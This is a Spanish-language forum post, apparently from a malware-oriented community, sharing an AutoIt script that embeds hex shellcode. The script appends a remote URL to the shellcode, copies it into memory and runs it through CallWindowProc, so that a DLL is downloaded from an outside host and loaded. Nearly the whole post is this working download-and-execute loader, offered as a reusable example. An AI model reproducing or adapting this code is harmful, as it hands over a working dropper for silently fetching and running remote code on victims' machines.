Buenas , empezando e mirando un poko sobre este tema del Shellcode , me saliu esto , espero les sirva de ejemplo

Saludos



Código: Seleccionar todo

#include<WinApi.au3>
;=============================
; Download e LoadLibrary Shellcode Example
; Descargar  e Cargar la Dll en Temp
; Languaje : AutoIt
; Autor : M3
; Credits to
; SCG v1.2 , Pink (Udtools.net) , SkyLined
; Ref : http://skypher.com/index.php/2010/01/11/download-and-loadlibrary-shellcode-released/
; Dll Used : http://skypher.com/dll
; Usage : sLoadFunc (URL)
; If Process OK Then DebugPrint = " Hello World "
;=============================


    sLoadFunc ("http://skypher.com/dll")


	Func sLoadFunc($sUrl)

		Local $sShellCode , $sShellBuffer

		$sUrl = StringToBinary($sUrl)

		$sLoadUrl = StringReplace($sUrl ,"0x","")

		$sShellCode = "0x" & "BFAA1AF3875731F6648B76308B760C8B761C8B6E088B368B5D3C8B5C1D7801EB8B4B1867E3EC8B7B2001EF8B7C8FFC01E" & _
		"F31C099321766C1CA01AE75F7663B1424E0E375CD8B532401EA0FB7144A8B7B1C01EF032C9766596659B40167E32E89CF29C46650686C6D6F6E666" & _
		"8757254FFD555E88EFFFFFF" & $sLoadUrl & "5E5A89E76A1659F3A4AA89E6575151515057565152FFE5"


		$sShellBuffer = DllStructCreate("Boolean[" & sReadBytes($sShellCode) & "]")


		$sPath = DllStructSetData($sShellBuffer, 1, $sShellCode)


		Call (_WinAPI_CallWindowProc(sStructBuffer($sShellBuffer), 0, 0, 0, 0))


    EndFunc




	Func sStructBuffer($Memory)

		Local $Ret = DllStructGetPtr($Memory)
		Return $Ret

	EndFunc




	Func sReadBytes($Data)

		Local $Value = BinaryLen($Data)
		Return $Value

	EndFunc
Indetectables RAT v.0.9.5

@Indetectables Team
Responder

Volver a “Fuentes”